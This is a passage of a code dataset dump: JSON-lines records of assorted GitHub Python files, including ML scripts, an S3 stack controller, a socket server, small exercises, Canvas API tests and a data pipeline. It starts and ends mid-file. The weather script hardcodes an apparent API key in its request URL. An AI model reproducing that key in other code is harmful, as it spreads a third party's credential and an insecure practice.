data)\nindex_test=np.random.choice(index, size=n_test, replace=False)\n# pick every 5th elements \n#index_test=index[::5]\n\ndudy_test=dudy_all_data[index_test]\nvist_test=vist_all_data[index_test]\nuv_out_test=uv_all_data[index_test]\nn_test=len(dudy_test) #TODO this might be length(dudy_test)*len(vist_test)\n\n# delete testing data from 'all data' => training data\ndudy_in=np.delete(dudy_all_data,index_test)\nvist_in=np.delete(vist_all_data,index_test)\nuv_out=np.delete(uv_all_data,index_test)\nn_svr=len(uv_out)\n\n# re-shape\ndudy_in=dudy_in.reshape(-1, 1)\nvist_in=vist_in.reshape(-1, 1)\n\n# scale input data \nscaler_dudy=StandardScaler()\nscaler_vist=StandardScaler()\ndudy_in=scaler_dudy.fit_transform(dudy_in)\nvist_in=scaler_vist.fit_transform(vist_in)\n\n# setup X (input) and y (output)\nX=np.zeros((n_svr,2))\ny=uv_out\nX[:,0]=dudy_in[:,0]\nX[:,1]=vist_in[:,0]\n\nprint('starting SVR')\n\n# choose Machine Learning model\n#TODO change C value\nC=1e+2\neps=1e-4\n# use Linear model\n#model = LinearSVR(epsilon = eps , C = C, max_iter=1000)\nmodel = SVR(kernel='rbf', epsilon = eps, C = C)\n\n# Fit the model\nsvr = model.fit(X, y.flatten())\n\n# re-shape test data\ndudy_test=dudy_test.reshape(-1, 1)\nvist_test=vist_test.reshape(-1, 1)\n\n# scale test data\ndudy_test=scaler_dudy.transform(dudy_test)\nvist_test=scaler_vist.transform(vist_test)\n\n# setup X (input) for testing (predicting)\nX_test=np.zeros((n_test,2))\nX_test[:,0]=dudy_test[:,0]\nX_test[:,1]=vist_test[:,0]\n\n# predict cmu\nuv_predict= model.predict(X_test)\n\n# find difference between ML prediction and target\nuv_error=np.std(uv_predict-uv_out_test)/\\\n(np.mean(uv_predict**2))**0.5\nprint('\\nRMS error using ML turbulence model',uv_error)\n\n#Convert to C_mu using bousinesq approximation\ndudy_test=scaler_dudy.inverse_transform(dudy_test)\nvist_test=scaler_vist.inverse_transform(vist_test)\ncmu_predict = np.divide(uv_predict,np.multiply(dudy_test,vist_test))\ncmu_out_test = np.divide(uv_out_test,np.multiply(dudy_test,vist_test))\n\n# plot predicted vs true values\nfig, ax = plt.subplots(figsize=(10,10))\nax.scatter(uv_out_test, uv_predict)\nax.plot(ax.get_xlim(), ax.get_ylim(), ls=\"--\", c=\".3\")\nax.set_xlabel('True Values')\nax.set_ylabel('Predicted Values')\nax.set_title('SVR Model Performance')\nplt.show(block=True)\n\n#Plot C_mu to dudy and vist\nfig, ax = plt.subplots(figsize=(10,10))\n\ndudy_mesh, vist_mesh = np.meshgrid(dudy_test, vist_test)\n\nax.contourf(dudy_mesh,vist_mesh,cmu_predict)\n\n#TODO save the model to export it to the CFD code\ndump(model, \"nut-model-svr.bin\")\ndump(scaler_dudy, \"nut-scalar-dudy-svr.bin\")\ndump(scaler_vist, \"nut-scalar-vist-svr.bin\")\nnp.savetxt(\"vist-svr.txt\", [min(dudy_all_data), max(dudy_all_data), min(vist_all_data), max(vist_all_data)])\n\n","repo_name":"IsakLundgren/Turbulence-Modeling-Assignment-1","sub_path":"ML-channel-nutdudy.py","file_name":"ML-channel-nutdudy.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42331282658","text":"'''get current weather data from openweathermap.org''' \nimport requests, json, pprint, datetime, time, sys, os \n#! python3\nif(len(sys.argv) < 2):\n print(\"Usage: weatherAPI.py location\")\n sys.exit() \n\nlocation = ' '.join(sys.argv[1:])\n\nurl=\"http://api.openweathermap.org/data/2.5/weather?q=%s&appid=0c14d536497f439a39cf86011099d24d\" % location\nresponse = requests.get(url)\nresponse.raise_for_status()\n\nweatherData = json.loads(response.text)\ndata = weatherData['weather']\nprint('Current weather in %s:' % (location))\nprint(data[0]['main'], '-', data[0]['description'])\n\ntemp=weatherData['main']\nprint(\"Current temperature: \", temp['temp']-273.15, \"Celsius\")\nprint()","repo_name":"Apoorvyash/weatherAPI","sub_path":"weatherAPI.py","file_name":"weatherAPI.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8520559839","text":"print('Gerador de PA')\nprint('-='*10)\nprimeiro = int(input('Primeiro termo: '))\nr = int(input('Razão da PA: '))\ntermo = primeiro\nc = 1\nwhile c <= 10:\n print('{} -> '.format(termo), end='')\n termo += r\n c += 1\nprint('FIM')\n","repo_name":"henriquebouwman/exercicios-mundo2","sub_path":"061.py","file_name":"061.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70083754028","text":"n, t, p = list(map(int, input().split()))\n\ninput_table = list()\nzeros_t = [0 for _ in range(t)]\nones_n = list()\nscore_n = [0 for _ in range(n)]\n\nfor idx in range(n):\n input_table.append(list(map(int, input().split())))\n ones_n.append(sum(input_table[idx]))\n\nfor score_p in range(t):\n for j in range(n):\n if input_table[j][score_p] == 0:\n zeros_t[score_p] += 1\n\nfor score_p in range(n):\n for j in range(t):\n score_n[score_p] += input_table[score_p][j] * zeros_t[j]\n\np -= 1\n\nres = 1\nones_p = ones_n[p]\nscore_p = score_n[p]\n\nfor idx in range(n):\n if score_n[idx] > score_p:\n res += 1\n if score_n[idx] == score_p and ones_n[idx] > ones_p:\n res += 1\n if score_n[idx] == score_p and ones_n[idx] == ones_p and idx < p:\n res += 1\n\nprint(score_p, res)\n","repo_name":"jeongth9446/problem-solving","sub_path":"acmicpc/python/5462_POI.py","file_name":"5462_POI.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"10677818693","text":"from socket import socket\nfrom select import select\n\nsock = socket()\nsock.bind((\"0.0.0.0\",9000))\nsock.listen(5)\nsock.setblocking(False)\nrlist = [sock]\nwlist = []\nxlist = []\n\nwhile True:\n rs,ws,xs = select(rlist,wlist,xlist)\n for i in rs:\n if i is sock:\n print(\"要开始了吆\")\n connfd,addr = sock.accept()\n connfd.setblocking(False)\n print(addr)\n rlist.append(connfd)\n else:\n data = i.recv(1024).decode()\n print(data)\n if not data:\n rlist.remove(i)\n continue\n wlist.append(i)\n for r in ws:\n r.send(b\"ok\")\n wlist.remove(r)\n\n","repo_name":"shangguanchenyu/-","sub_path":"select_IO.py","file_name":"select_IO.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40583030204","text":"from paco.core.exception import StackException, PacoBucketExists\nfrom paco.core.exception import PacoErrorCode\nfrom paco.models import schemas\nfrom paco.models import references\nfrom paco.models.locations import get_parent_by_interface\nfrom paco.stack import StackGroup\nfrom paco.controllers.controllers import Controller\nfrom botocore.exceptions import ClientError\nfrom paco.models import vocabulary\nfrom paco.stack import StackOrder, Stack, StackGroup, StackHooks, StackTags\nimport botocore\nimport copy\nimport os\nimport paco.cftemplates\n\n\nclass S3StackGroup(StackGroup):\n def __init__(\n self,\n paco_ctx,\n account_ctx,\n region,\n group_name,\n controller,\n resource_ref,\n stack_hooks=None\n ):\n aws_name = group_name\n super().__init__(\n paco_ctx,\n account_ctx,\n group_name,\n aws_name,\n controller\n )\n self.stack_hooks = stack_hooks\n\nclass S3Context():\n def __init__(self, paco_ctx, account_ctx, region, controller, stack_group, resource_ref, stack_tags):\n self.paco_ctx = paco_ctx\n self.stack_group = stack_group\n self.controller = controller\n self.region = region\n self.account_ctx = account_ctx\n self.resource_ref = resource_ref\n self.stack_tags = stack_tags\n self.bucket_context = {\n 'group_id': None,\n 'config': None,\n 'ref': resource_ref,\n 'stack': None\n }\n\n def add_stack_hooks(self, stack_hooks):\n if self.bucket_context['stack'] == None:\n return\n self.bucket_context['stack'].add_hooks(stack_hooks)\n\n def add_stack(\n self,\n bucket_policy_only=False,\n stack_hooks=None,\n new_stack=True,\n stack_tags=None,\n ):\n stack = self.stack_group.add_new_stack(\n self.region,\n self.bucket_context['config'],\n paco.cftemplates.S3,\n account_ctx=self.account_ctx,\n stack_tags=stack_tags,\n stack_hooks=stack_hooks,\n extra_context={'bucket_context': self.bucket_context, 'bucket_policy_only': bucket_policy_only}\n )\n if bucket_policy_only == False:\n if self.bucket_context['stack'] != None:\n raise StackException(PacoErrorCode.Unknown)\n self.bucket_context['stack'] = stack\n\n def add_bucket(\n self,\n bucket,\n bucket_name_prefix=None,\n bucket_name_suffix=None,\n stack_hooks=None,\n change_protected=False\n ):\n \"Add a bucket: will create a stack and stack hooks as needed\"\n if self.bucket_context['config'] != None:\n raise PacoBucketExists(\"Bucket already exists: %s\" % (self.resource_ref))\n\n bucket.bucket_name_prefix = bucket_name_prefix\n bucket.bucket_name_suffix = bucket_name_suffix\n res_group = get_parent_by_interface(bucket, schemas.IResourceGroup)\n if res_group != None:\n self.bucket_context['group_id'] = res_group.name\n self.bucket_context['config'] = bucket\n self.bucket_context['ref'] = self.resource_ref\n bucket.resolve_ref_obj = self\n\n if bucket.external_resource == True:\n # if the bucket already exists, do not create a stack for it\n pass\n else:\n if change_protected == False:\n if stack_hooks == None:\n stack_hooks = StackHooks()\n # S3 Delete on Stack Delete hook\n stack_hooks.add(\n 'S3StackGroup', 'delete', 'pre',\n self.stack_hook_pre_delete, None, self.bucket_context\n )\n self.add_stack(\n bucket_policy_only=False,\n stack_hooks=stack_hooks,\n stack_tags=self.stack_tags,\n )\n\n def add_bucket_policy(self, policy_dict, stack_hooks=None, new_stack=True):\n bucket_config = self.bucket_context['config']\n # XXX: Disabled: Bucket policies are overwritten when updated with a new stack.\n # This means we want all of the policies previously provisioned.\n # If this is a new stack, mark previous policies as processed so they\n # are not written twice.\n #if new_stack == True:\n #for policy in bucket_config.policy:\n # policy.processed = True\n bucket_config.add_policy(policy_dict)\n self.add_stack(\n bucket_policy_only=True,\n stack_hooks=stack_hooks,\n stack_tags=self.stack_tags\n )\n\n def get_bucket_arn(self):\n return 'arn:aws:s3:::' + self.bucket_context['config'].get_bucket_name()\n\n def get_bucket_url(self):\n bucket_name = self.bucket_context['config'].get_bucket_name()\n bucket_region = self.bucket_context['stack'].aws_region\n return f'{bucket_name}.s3.{bucket_region}.amazonaws.com'\n\n def get_bucket_account_id(self):\n return self.account_ctx.id\n\n def get_region(self):\n return self.region\n\n def validate(self):\n if self.stack_group:\n self.stack_group.validate()\n\n def provision(self):\n if self.stack_group:\n self.stack_group.provision()\n\n def delete(self):\n if self.stack_group:\n self.stack_group.delete()\n\n def stack_hook_pre_delete(self, hook, hook_arg):\n \"Empty the S3 Bucket if enabled\"\n bucket_context = hook_arg\n s3_config = bucket_context['config']\n s3_resource = self.account_ctx.get_aws_resource('s3', self.region)\n deletion_policy = s3_config.deletion_policy\n bucket_name = s3_config.get_bucket_name()\n if deletion_policy == \"delete\":\n self.paco_ctx.log_action_col('Run', 'Hook', 'Delete', bucket_name)\n bucket = s3_resource.Bucket(bucket_name)\n try:\n bucket.object_versions.delete()\n bucket.objects.all().delete()\n bucket.delete()\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] != 'NoSuchBucket':\n print(\"%s: %s\" % (e.response['Error']['Code'], e.response['Error']['Message']))\n raise StackException(PacoErrorCode.Unknown)\n else:\n self.paco_ctx.log_action_col('Run', 'Hook', 'Retain', bucket_name)\n\n def empty_bucket(self):\n if self.bucket_context == None:\n print(f\"ctl_s3: empty_bucket: ERROR: Unable to locate stack group for group: {self.bucket_context['group_id']}\")\n raise StackException(PacoErrorCode.Unknown)\n s3_client = self.account_ctx.get_aws_client('s3')\n bucket_name = self.bucket_context['config'].get_bucket_name()\n try:\n response = s3_client.list_objects_v2(Bucket=bucket_name)\n except ClientError as e:\n if e.response['Error']['Code'] == 'NoSuchBucket':\n return\n else:\n raise e\n\n if 'Contents' in response:\n for item in response['Contents']:\n s3_client.delete_object(Bucket=bucket_name, Key=item['Key'])\n while response['KeyCount'] == 1000:\n response = s3_client.list_objects_v2(\n Bucket=bucket_name,\n StartAfter=response['Contents'][0]['Key'],\n )\n for item in response['Contents']:\n s3_client.delete_object(Bucket=bucket_name, Key=item['Key'])\n\n def resolve_ref(self, ref):\n if ref.last_part == 'arn':\n return self.get_bucket_arn()\n elif ref.last_part == 'name':\n return self.bucket_context['config'].get_bucket_name()\n elif ref.last_part == 'url':\n return self.get_bucket_url()\n elif ref.last_part == 'origin_id':\n return self.bucket_context['stack']\n else:\n return self.bucket_context['config']\n\nclass S3Controller(Controller):\n def __init__(self, paco_ctx):\n super().__init__(paco_ctx, \"S3\", \"Resource\")\n self.contexts = {}\n self.init_s3_resource_done = False\n\n def init_s3_resource(self, bucket_list, stack_tags):\n \"Init global S3 Buckets from resource/s3.yaml\"\n if self.init_s3_resource_done == True:\n return\n self.init_s3_resource_done = True\n s3_env_map = {}\n s3resource = self.paco_ctx.project['resource']['s3']\n for bucket_id in bucket_list:\n bucket_config = s3resource.buckets[bucket_id]\n account_ctx = self.paco_ctx.get_account_context(account_ref=bucket_config.account)\n region = bucket_config.region\n s3_env_id = '-'.join([account_ctx.get_name(), region])\n if s3_env_id not in s3_env_map.keys():\n s3_env_config = {\n 'id': s3_env_id,\n 'account_ctx': account_ctx,\n 'region': region,\n 'buckets': [] # Array of [[bucket_id, bucket_config],...]\n }\n s3_env_map[s3_env_id] = s3_env_config\n s3_env_map[s3_env_id]['buckets'].append([bucket_id, bucket_config])\n\n # initialize S3 Bucket stack groups\n for env_id, env_config in s3_env_map.items():\n for bucket_id, bucket_config in env_config['buckets']:\n env_stack_group = S3StackGroup(\n self.paco_ctx,\n env_config['account_ctx'],\n env_config['region'],\n 'bucket',\n self,\n bucket_config.paco_ref,\n stack_hooks=None\n )\n self.init_context(\n env_config['account_ctx'],\n env_config['region'],\n bucket_config.paco_ref,\n env_stack_group,\n stack_tags\n )\n self.add_bucket(bucket_config)\n\n def resolve_ref(self, ref):\n \"Find the bucket then call resolve_ref on it\"\n buckets = self.paco_ctx.project['resource']['s3'].buckets\n return buckets[ref.parts[3]].resolve_ref(ref)\n\n def init(self, command=None, model_obj=None):\n \"Init S3 Buckets\"\n if model_obj != None:\n bucket_list = []\n if schemas.IS3Resource.providedBy(model_obj):\n bucket_list.extend(model_obj.buckets.keys())\n else:\n bucket_list.append(model_obj.name)\n self.init_s3_resource(bucket_list, stack_tags=None)\n # Set resolve_ref_obj for global buckets\n s3resource = self.paco_ctx.project['resource']['s3']\n s3resource.resolve_ref_obj = self\n\n def init_context(self, account_ctx, region, resource_ref, stack_group, stack_tags):\n if resource_ref.startswith('paco.ref '):\n resource_ref = resource_ref.replace('paco.ref ', '')\n if resource_ref not in self.contexts.keys():\n self.contexts[resource_ref] = S3Context(self.paco_ctx, account_ctx, region, self, stack_group, resource_ref, stack_tags)\n # Add an 'paco.ref ' key here so that we can take paco.ref's from the yaml\n # and still do a lookup on them\n self.contexts['paco.ref ' + resource_ref] = self.contexts[resource_ref]\n\n def context_list(self):\n \"Returns contexts that do not include the redundant 'paco.ref ' prefixed keys.\"\n contexts = []\n for key, value in self.contexts.items():\n if key.startswith('paco.ref '):\n continue\n contexts.append(value)\n return contexts\n\n def add_bucket(self, bucket, config_ref=None, **kwargs):\n if config_ref:\n return self.contexts[config_ref].add_bucket(bucket, **kwargs)\n else:\n return self.contexts[bucket.paco_ref].add_bucket(bucket, **kwargs)\n\n def add_bucket_policy(self, resource_ref, *args, **kwargs):\n return self.contexts[resource_ref].add_bucket_policy(*args, **kwargs)\n\n def add_stack_hooks(self, resource_ref, *args, **kwargs):\n return self.contexts[resource_ref].add_stack_hooks(*args, **kwargs)\n\n def get_bucket_arn(self, resource_ref, *args, **kwargs):\n if not resource_ref.startswith('paco.ref '):\n resource_ref = 'paco.ref ' + resource_ref\n references.resolve_ref(resource_ref, self.paco_ctx.project)\n return self.contexts[resource_ref].get_bucket_arn(*args, **kwargs)\n\n def get_bucket_name(self, resource_ref, *args, **kwargs):\n return self.contexts[resource_ref].bucket_context['config'].get_bucket_name()\n\n def get_bucket_account_id(self, resource_ref, *args, **kwargs):\n return self.contexts[resource_ref].get_bucket_account_id(*args, **kwargs)\n\n def empty_bucket(self, resource_ref, *args, **kwargs):\n return self.contexts[resource_ref].empty_bucket(*args, **kwargs)\n\n def get_region(self, resource_ref, *args, **kwargs):\n return self.contexts[resource_ref].empty_bucket(*args, **kwargs)\n\n def validate(self, resource_ref=None):\n if resource_ref != None and resource_ref in self.contexts:\n return self.contexts[resource_ref].validate()\n elif resource_ref == None:\n for s3_context in self.context_list():\n s3_context.validate()\n\n def provision(self, resource_ref=None):\n if resource_ref != None and resource_ref in self.contexts:\n return self.contexts[resource_ref].provision()\n elif resource_ref == None:\n for s3_context in self.context_list():\n s3_context.provision()\n\n def delete(self, resource_ref=None):\n if resource_ref != None and resource_ref in self.contexts:\n return self.contexts[resource_ref].delete()\n elif resource_ref == None:\n for s3_context in self.context_list():\n s3_context.delete()\n\n","repo_name":"waterbear-cloud/paco","sub_path":"src/paco/controllers/ctl_s3.py","file_name":"ctl_s3.py","file_ext":"py","file_size_in_byte":14041,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"11158016071","text":"\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Text search using embeddings\r\nfrom openai.embeddings_utils import get_embedding, cosine_similarity\r\n\r\ndef search_reviews(df, product_description, n=3, pprint=True):\r\n embedding = get_embedding(product_description, model='text-embedding-ada-002')\r\n df['similarities'] = df.ada_embedding.apply(lambda x: cosine_similarity(x, embedding))\r\n res = df.sort_values('similarities', ascending=False).head(n)\r\n return res\r\n\r\nres = search_reviews(df, 'delicious beans', n=3)\r\n\r\n#Code search using embeddings\r\nfrom openai.embeddings_utils import get_embedding, cosine_similarity\r\n\r\ndf['code_embedding'] = df['code'].apply(lambda x: get_embedding(x, model='text-embedding-ada-002'))\r\n\r\ndef search_functions(df, code_query, n=3, pprint=True, n_lines=7):\r\n embedding = get_embedding(code_query, model='text-embedding-ada-002')\r\n df['similarities'] = df.code_embedding.apply(lambda x: cosine_similarity(x, embedding))\r\n\r\n res = df.sort_values('similarities', ascending=False).head(n)\r\n return res\r\nres = search_functions(df, 'Completions API tests', n=3)","repo_name":"JustinAlchemicTech/Complex-GPT-Chatbot-Interface-AD","sub_path":"Github Complex Chatbot (Active Development)/Scripts/response_chatbot.py","file_name":"response_chatbot.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40788758647","text":"\r\nfrom model import Bert4Sum\r\nfrom prepare_data import *\r\nimport torch\r\nimport time, jieba\r\nfrom transformers import logging as lg\r\nlg.set_verbosity_error()\r\n\r\nmodel_type = \"../model\"\r\nmodel = Bert4Sum(model_type)\r\nmodel.load_state_dict(torch.load('checkpoint1.th', map_location='cpu'))\r\nmodel.cuda()\r\n\r\ntokenizer = BertTokenizer.from_pretrained(model_type)\r\n\r\ndef to_list(tensor):\r\n return tensor.detach().cpu().tolist()\r\n\r\ndef get_new_text(text):\r\n\r\n while '[' in text and ']' in text:\r\n a = text.index('[')\r\n b = text.index(']')\r\n if a= 0.5 and tokens[i] not in [\"[CLS]\", \"[SEP]\", \"[UNK]\"]:\r\n temp = tokens[i].replace(\" ##\", \"\")\r\n temp = temp.replace(\"##\", \"\")\r\n res += temp\r\n return res\r\n\r\ndef refine_outline(outline):\r\n if len(outline) > 5:\r\n olist = jieba.lcut(outline)\r\n res = \"\"\r\n for i in range(len(olist) - 1):\r\n if olist[i] not in olist[i+1:]:\r\n res += olist[i]\r\n res += olist[-1]\r\n return res\r\n else:\r\n return outline\r\n\r\ndef get_all_outline(filename=\"./data/result.jsonl\"):\r\n\r\n file = open(filename, encoding='utf-8')\r\n print(\"Start update!\")\r\n time_start = time.time() # 记录开始时间\r\n while 1:\r\n line = file.readline()\r\n if not line:\r\n break\r\n pre = eval(line)\r\n url = pre[\"url\"]\r\n key_points = pre[\"key_points\"]\r\n\r\n index = 0\r\n for kp in key_points:\r\n outline = kp[\"outline\"]\r\n new_outline = get_one_outline(outline)\r\n if new_outline != \"\":\r\n kp[\"outline\"] = new_outline\r\n else:\r\n kp[\"outline\"] = get_new_text(outline)\r\n\r\n kp[\"outline\"] = refine_outline(kp[\"outline\"])\r\n\r\n res = {\"url\": url, \"key_points\": key_points}\r\n with open('./data/new_result.jsonl', \"a+\") as outFile:\r\n outFile.write(json.dumps(res, ensure_ascii=False) + '\\n')\r\n time_end = time.time() # 记录结束时间\r\n time_sum = (time_end - time_start) / 60 # 计算的时间差为程序的执行时间,单位为秒/s\r\n print(\"End update! Time consume: {}\".format(time_sum))\r\n\r\nget_all_outline()\r\n\r\n\r\n\r\n","repo_name":"kuaile779/CCL2022Video-Viewpoint-Extration","sub_path":"twoStagesModel/summary/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39349979938","text":"def names():\n d={}\n while(1):\n s=input(\"Enter next name: \")\n if s == \"\":\n break\n if s in d.keys():\n d[s] = d[s] + 1\n else:\n d[s] = 1\n for k in sorted(d.keys()):\n if d[k]==1:\n print(\"There is\",d[k],\"student named\",k)\n else:\n print(\"There are\",d[k],\"students named\",k)\n\nnames()","repo_name":"narenchandra859/PythonLabExam","sub_path":"Solutions/11a.py","file_name":"11a.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20654609145","text":"from django.urls import path\nfrom . import views\n\nurlpatterns=[\n path('submit/expense/',views.submit_expense),\n path('submit/income/',views.submit_income),\n path('about/',views.about_view),\n path('register/',views.register),\n path('',views.home_view),\n\n]\n","repo_name":"soheilRasekh/bestoon","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42447555380","text":"import gymnasium\nfrom gymnasium.vector.async_vector_env import AsyncVectorEnv\n\n\ndef make_env(env_name):\n def _make():\n _env = gymnasium.make(env_name)\n return _env\n\n return _make\n\n\ndef main():\n env_id = \"Ant-v4\"\n num_envs = 5\n vec_env = AsyncVectorEnv([make_env(env_id) for i in range(num_envs)])\n\n state = vec_env.reset()\n\n for i in range(5000):\n action = vec_env.action_space.sample()\n state, reward, done, _ = vec_env.step(action)\n if any(done):\n done_idx = [i for i, e in enumerate(done) if e]\n print(f\"{done_idx}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yhisaki/rl-algos","sub_path":"example/external_lib/example_gym_vec_env.py","file_name":"example_gym_vec_env.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1674953529","text":"from unittest import TestCase\nfrom commonconf import override_settings\nfrom uw_canvas import MissingAccountID\nfrom uw_canvas.utilities import fdao_canvas_override\nfrom uw_canvas.grading_standards import GradingStandards\nimport mock\n\n\n@fdao_canvas_override\nclass CanvasTestGradingStandards(TestCase):\n def setUp(self):\n self.account_json_data = {\n \"id\": \"2\",\n \"title\": \"Test Account Grading Standard\",\n \"context_type\": \"Account\",\n \"context_id\": \"999999\",\n \"grading_scheme\": [\n {\"name\": \"A\", \"value\": 0.95},\n {\"name\": \"B\", \"value\": 0.85},\n {\"name\": \"C\", \"value\": 0.75},\n {\"name\": \"D\", \"value\": 0.65},\n ]\n }\n\n self.course_json_data = {\n \"id\": \"1\",\n \"title\": \"Test Course Grading Standard\",\n \"context_type\": \"Course\",\n \"context_id\": \"123456\",\n \"grading_scheme\": [\n {\"name\": \"A\", \"value\": 0.9},\n {\"name\": \"B\", \"value\": 0.8},\n {\"name\": \"C\", \"value\": 0.7},\n {\"name\": \"D\", \"value\": 0.6},\n ]\n }\n\n @mock.patch.object(GradingStandards, '_get_resource')\n def test_get_grading_standard_for_account(self, mock_get):\n mock_get.return_value = self.account_json_data\n canvas = GradingStandards()\n\n model = canvas.get_grading_standard_for_account(\n \"999999\", \"123\")\n mock_get.assert_called_with(\n '/api/v1/accounts/999999/grading_standards/123')\n self.assertEqual(model.json_data(), self.account_json_data)\n\n @mock.patch.object(GradingStandards, '_get_resource')\n def test_find_grading_standard_for_account(self, mock_get):\n mock_get.return_value = self.account_json_data\n canvas = GradingStandards()\n model = canvas.find_grading_standard_for_account(999999, 2)\n self.assertEqual(model.json_data(), self.account_json_data)\n\n @override_settings(RESTCLIENTS_CANVAS_ACCOUNT_ID=None)\n def test_find_grading_standard_for_missing_root_account(self):\n canvas = GradingStandards()\n self.assertRaises(\n MissingAccountID, canvas.find_grading_standard_for_account,\n 999999, 2)\n\n @mock.patch.object(GradingStandards, '_get_resource')\n def test_get_grading_standard_for_course(self, mock_get):\n mock_get.return_value = self.course_json_data\n canvas = GradingStandards()\n\n model = canvas.get_grading_standard_for_course(\n \"123456\", \"225\")\n mock_get.assert_called_with(\n '/api/v1/courses/123456/grading_standards/225')\n self.assertEqual(model.json_data(), self.course_json_data)\n\n @mock.patch.object(GradingStandards, '_get_resource_url')\n def test_get_grading_standards_for_course(self, mock_get):\n mock_get.return_value = [self.course_json_data]\n canvas = GradingStandards()\n\n ret = canvas.get_grading_standards_for_course(\"123456\")\n mock_get.assert_called_with(\n '/api/v1/courses/123456/grading_standards', True, None)\n\n model = ret[0]\n self.assertEqual(\n model.grading_standard_id, self.course_json_data[\"id\"])\n self.assertEqual(model.title, self.course_json_data[\"title\"])\n self.assertEqual(\n model.context_type, self.course_json_data[\"context_type\"])\n self.assertEqual(\n model.context_id, self.course_json_data[\"context_id\"])\n self.assertEqual(\n model.grading_scheme, self.course_json_data[\"grading_scheme\"])\n\n @mock.patch.object(GradingStandards, '_post_resource')\n def test_create_grading_standard_for_course(self, mock_create):\n mock_create.return_value = None\n canvas = GradingStandards()\n\n canvas.create_grading_standard_for_course(\n \"123456\", \"New Grading Standard\", [{\"name\": \"A\", \"value\": 0.9}],\n \"5555555\")\n mock_create.assert_called_with(\n '/api/v1/courses/123456/grading_standards', {\n 'title': 'New Grading Standard',\n 'grading_scheme_entry': [{\"name\": \"A\", \"value\": 0.9}],\n 'as_user_id': '5555555'})\n","repo_name":"uw-it-aca/uw-restclients-canvas","sub_path":"uw_canvas/tests/test_grading_standards.py","file_name":"test_grading_standards.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72379315627","text":"import functools\nfrom typing import List, Optional\n\nimport jax\nimport jraph\nfrom ml_collections import config_dict\nimport numpy as np\nfrom ogb import utils\nfrom ogb.utils import features\nimport tensorflow.compat.v2 as tf\nimport tensorflow_datasets as tfds\nimport tree\n\n# pylint: disable=g-bad-import-order\n# pytype: disable=import-error\nimport batching_utils\nimport conformer_utils\nimport datasets\n\n\ncurry = lambda f: functools.partial(functools.partial, f)\n\n\ndef build_dataset_iterator(\n data_root: str,\n split: str,\n dynamic_batch_size_config: config_dict.ConfigDict,\n sample_random: float,\n cached_conformers_file: str,\n debug: bool = False,\n is_training: bool = True,\n augment_with_random_mirror_symmetry: bool = False,\n positions_noise_std: Optional[float] = None,\n k_fold_split_id: Optional[int] = None,\n num_k_fold_splits: Optional[int] = None,\n filter_in_or_out_samples_with_nans_in_conformers: Optional[str] = None,\n):\n \"\"\"Returns an iterator over Batches from the dataset.\"\"\"\n if debug:\n max_items_to_read_from_dataset = 10\n prefetch_buffer_size = 1\n shuffle_buffer_size = 1\n else:\n max_items_to_read_from_dataset = -1 # < 0 means no limit.\n prefetch_buffer_size = 64\n # It can take a while to fill the shuffle buffer with k fold splits.\n shuffle_buffer_size = 128 if k_fold_split_id is None else int(1e6)\n\n num_local_devices = jax.local_device_count()\n\n # Load all smile strings.\n indices, smiles, labels = _load_smiles(\n data_root,\n split,\n k_fold_split_id=k_fold_split_id,\n num_k_fold_splits=num_k_fold_splits)\n if debug:\n indices = indices[:100]\n smiles = smiles[:100]\n labels = labels[:100]\n # Generate all conformer features from smile strings ahead of time.\n # This gives us a boost from multi-parallelism as opposed to doing it\n # online.\n conformers = _load_conformers(indices, smiles, cached_conformers_file)\n\n data_generator = (\n lambda: _get_pcq_graph_generator(indices, smiles, labels, conformers))\n # Create a dataset yielding graphs from smile strings.\n example = next(data_generator())\n signature_from_example = tree.map_structure(_numpy_to_tensor_spec, example)\n ds = tf.data.Dataset.from_generator(\n data_generator, output_signature=signature_from_example)\n\n ds = ds.take(max_items_to_read_from_dataset)\n ds = ds.cache()\n if is_training:\n ds = ds.shuffle(shuffle_buffer_size)\n\n # Apply transformations.\n def map_fn(graph, conformer_positions):\n graph = _maybe_one_hot_atoms_with_noise(\n graph, is_training=is_training, sample_random=sample_random)\n # Add conformer features.\n graph = _add_conformer_features(\n graph,\n conformer_positions,\n augment_with_random_mirror_symmetry=augment_with_random_mirror_symmetry,\n noise_std=positions_noise_std,\n is_training=is_training,\n )\n return _downcast_ints(graph)\n\n ds = ds.map(map_fn, num_parallel_calls=tf.data.AUTOTUNE)\n if filter_in_or_out_samples_with_nans_in_conformers:\n if filter_in_or_out_samples_with_nans_in_conformers not in (\"in\", \"out\"):\n raise ValueError(\n \"Unknown value specified for the argument \"\n \"`filter_in_or_out_samples_with_nans_in_conformers`: %s\" %\n filter_in_or_out_samples_with_nans_in_conformers)\n\n filter_fn = _get_conformer_filter(\n 